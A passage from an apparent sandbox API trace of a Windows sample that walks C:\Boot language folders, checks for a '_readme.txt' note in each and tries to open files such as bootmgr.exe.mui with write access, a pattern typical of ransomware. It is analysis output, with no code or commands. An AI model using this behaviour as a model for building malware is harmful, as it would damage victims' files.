hHeap=0x680000, dwFlags=0x0, lpMem=0x99f05a0 | out: hHeap=0x680000) returned 1 [0093.140] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.140] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.140] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.140] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.140] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.140] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.140] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0093.140] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0093.140] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.140] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.140] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0093.140] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0093.140] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.140] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.140] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.140] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.140] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.140] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.140] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.140] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.140] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.140] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.141] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.141] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f05a0 [0093.141] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.141] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f05a0 | out: hHeap=0x680000) returned 1 [0093.141] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.141] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.141] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0093.141] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.141] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.141] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.141] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.141] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.141] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.141] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.141] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.141] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.141] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.141] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.141] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.141] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.141] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.141] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.141] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.141] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.141] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.141] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.141] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.141] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.141] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.141] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.141] PathFindFileNameW (pszPath="C:\\Boot\\pt-PT\\") returned="pt-PT\\" [0093.141] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.141] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.141] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0093.141] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.142] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0093.142] PathFindFileNameW (pszPath="") returned="" [0093.142] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.142] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75670000 [0093.142] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathW") returned 0x756f5708 [0093.142] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x800) returned 0x31d1120 [0093.142] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x31d1120 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0093.142] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x810) returned 0x99c9c68 [0093.142] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.142] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.142] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.142] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.142] FreeLibrary (hLibModule=0x75670000) returned 1 [0093.143] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.143] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d1120 | out: hHeap=0x680000) returned 1 [0093.143] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.143] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.143] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x81c) returned 0x99c9c68 [0093.143] PathAppendW (in: pszPath="C:\\Boot\\pt-PT\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\pt-PT\\_readme.txt") returned 1 [0093.143] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.143] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.143] PathFileExistsW (pszPath="C:\\Boot\\pt-PT\\_readme.txt") returned 1 [0093.143] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.143] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.143] FindFirstFileW (in: lpFileName="C:\\Boot\\pt-PT\\*", lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa340adc0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa340adc0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31c75c0 [0093.143] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.143] FindNextFileW (in: hFindFile=0x31c75c0, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa340adc0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa340adc0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.143] FindNextFileW (in: hFindFile=0x31c75c0, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe823ce95, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15e40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0093.143] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.143] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d3538 [0093.143] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.143] PathFindExtensionW (pszPath="C:\\Boot\\pt-PT\\bootmgr.exe.mui") returned=".mui" [0093.143] CreateFileW (lpFileName="C:\\Boot\\pt-PT\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-pt\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.144] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d3538 | out: hHeap=0x680000) returned 1 [0093.144] FindNextFileW (in: hFindFile=0x31c75c0, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa340adc0, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa340adc0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa340adc0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x457, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0093.144] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.144] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d3538 [0093.144] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.144] PathFindExtensionW (pszPath="C:\\Boot\\pt-PT\\_readme.txt") returned=".txt" [0093.144] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d3538 | out: hHeap=0x680000) returned 1 [0093.144] FindNextFileW (in: hFindFile=0x31c75c0, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa340adc0, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa340adc0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa340adc0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x457, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0093.144] FindClose (in: hFindFile=0x31c75c0 | out: hFindFile=0x31c75c0) returned 1 [0093.144] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.144] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef540 | out: hHeap=0x680000) returned 1 [0093.144] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0093.144] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef540 [0093.144] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0093.144] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.144] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.144] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.144] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.144] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.144] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.144] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.144] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.144] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.144] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.144] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.144] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.145] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.145] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.145] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.145] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.145] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.145] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.145] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.145] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.145] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.145] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0093.145] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.145] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.145] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.145] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.145] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99f05a0 [0093.145] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.145] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f05a0 | out: hHeap=0x680000) returned 1 [0093.145] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.145] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.145] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.145] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.145] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.145] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.145] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0093.145] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.145] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.146] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.146] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0093.146] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0093.146] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.146] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.146] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0093.146] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0093.146] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.146] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.146] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.146] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.146] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.146] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.146] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.146] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.146] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.146] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.146] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0093.146] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.146] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.146] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.146] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0093.146] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.146] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.146] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.146] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.147] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.147] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.147] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.147] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.147] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.147] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.147] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.147] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.147] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.147] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.147] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.147] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.147] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.147] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.147] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.147] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.147] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.147] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.147] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.147] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.147] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.147] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.147] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.147] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.147] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.147] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.148] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.148] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.148] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f05a0 [0093.148] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.148] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f05a0 | out: hHeap=0x680000) returned 1 [0093.148] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.148] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.148] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.148] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.148] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.148] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.148] PathFindFileNameW (pszPath="C:\\Boot\\ru-RU\\") returned="ru-RU\\" [0093.148] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0093.148] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.148] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0093.148] PathFindFileNameW (pszPath="") returned="" [0093.148] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75670000 [0093.149] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathW") returned 0x756f5708 [0093.149] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x31d1120 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0093.149] FreeLibrary (hLibModule=0x75670000) returned 1 [0093.149] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.149] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d1120 | out: hHeap=0x680000) returned 1 [0093.149] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.150] PathAppendW (in: pszPath="C:\\Boot\\ru-RU\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\ru-RU\\_readme.txt") returned 1 [0093.150] PathFileExistsW (pszPath="C:\\Boot\\ru-RU\\_readme.txt") returned 1 [0093.150] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.150] FindFirstFileW (in: lpFileName="C:\\Boot\\ru-RU\\*", lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa3430f20, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa3430f20, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31c75c0 [0093.150] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.150] FindNextFileW (in: hFindFile=0x31c75c0, 